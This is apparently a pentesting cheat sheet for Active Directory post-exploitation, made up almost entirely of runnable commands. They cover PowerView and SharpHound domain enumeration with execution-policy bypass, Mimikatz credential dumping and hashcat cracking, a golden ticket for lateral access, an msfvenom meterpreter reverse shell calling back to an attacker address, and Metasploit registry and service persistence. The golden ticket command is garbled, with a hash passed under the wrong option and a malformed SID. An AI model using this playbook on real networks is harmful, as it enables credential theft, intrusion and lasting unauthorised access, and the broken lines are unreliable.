After getting the foot in the door in a pentesting scenario or competition it is time for gathering more data and credentials and creating persistence:

  • PowerView – Enumerating the domain.
  • SharpHound – Hammering that DC to extract all available data.
  • BloodHound – Analysing the extracted data from the domain.
  • Mimikatz – Dumping hashes.
    • Hashcat – Cracking the dumped hashes.
    • Golden Ticket – Getting access to other machines.
  • Msfvenom – Crafting a payload.
  • Metasploit – Getting the reverse shell and creating persistence.

Enumerating the domain with the PowerShell script PowerView – Full command list available at [Link]:

cmd
powershell -ep bypass
. .\PATH\PowerView.ps1

Enumerate Domain Users

Get-NetUser | select cn

Enumerate Computers

Get-NetComputer -fulldata | select operatingsystem

Enumerate Groups

Get-NetGroup -GroupName *admin*

Enumerate Shares

Invoke-ShareFinder

Extract the loot from any computer joined to the domain with SharpHound script:

powershell -ep bypass
. .\PATH\SharpHound.ps1
Invoke-Bloodhound -CollectionMethod All -Domain DOMAIN.local -ZipFileName loot.zip

Copy the file over to the attacker’s machine.


Explore the domain with BloodHound. Neo4j is just the database used by BloodHound.

Installing the tool on the attacker machine:

sudo apt install bloodhound neo4j -y
sudo neo4j console

The default credentials for the database are neo4j:neo4j. Navigate to http://localhost:7474/ and change the default password.

Then execute the BloodHound application:

bloodhound

Click on the import button or simply drag and drop the .zip file.

On the left menu, look for Queries / Analysis.


Dumping hashes with Mimikatz:

mimikatz.exe
privilege::debug
lsadump::lsa /patch

Chacking the dumped hashes with HashCat:

hashcat -m 1000 hashes.lst /usr/share/wordlists/rockyou.txt

Creating a Golden Ticket with Mimikatz:

lsadump::lsa /inject /name:userName
kerberos::golden /user:administrator /domain:domain.local /sid:S-3-5-41-845420856-2351964987-986696098 /userName:5508500012cc005cf7082a9a89ebdfdf /id:500
misc::cmd

Getting access to other machines with the Golden Ticket on the newly open window:

dir \\ComputerA\c$

CREATING PERSISTENCE

Crafting a payload with Msfvenom:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.99 LPORT=4444 -f exe -o shell.exe

On the attacker side start a listener with Metasploit – Module Library available at [Link]:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
run
background

Applying persistence to the granted session with Persistent Registry Startup Payload Installer:

use exploit/windows/local/persistence
sessions
set session 1

See also exploit/windows/local/persistence_service for Persistent Service Installer.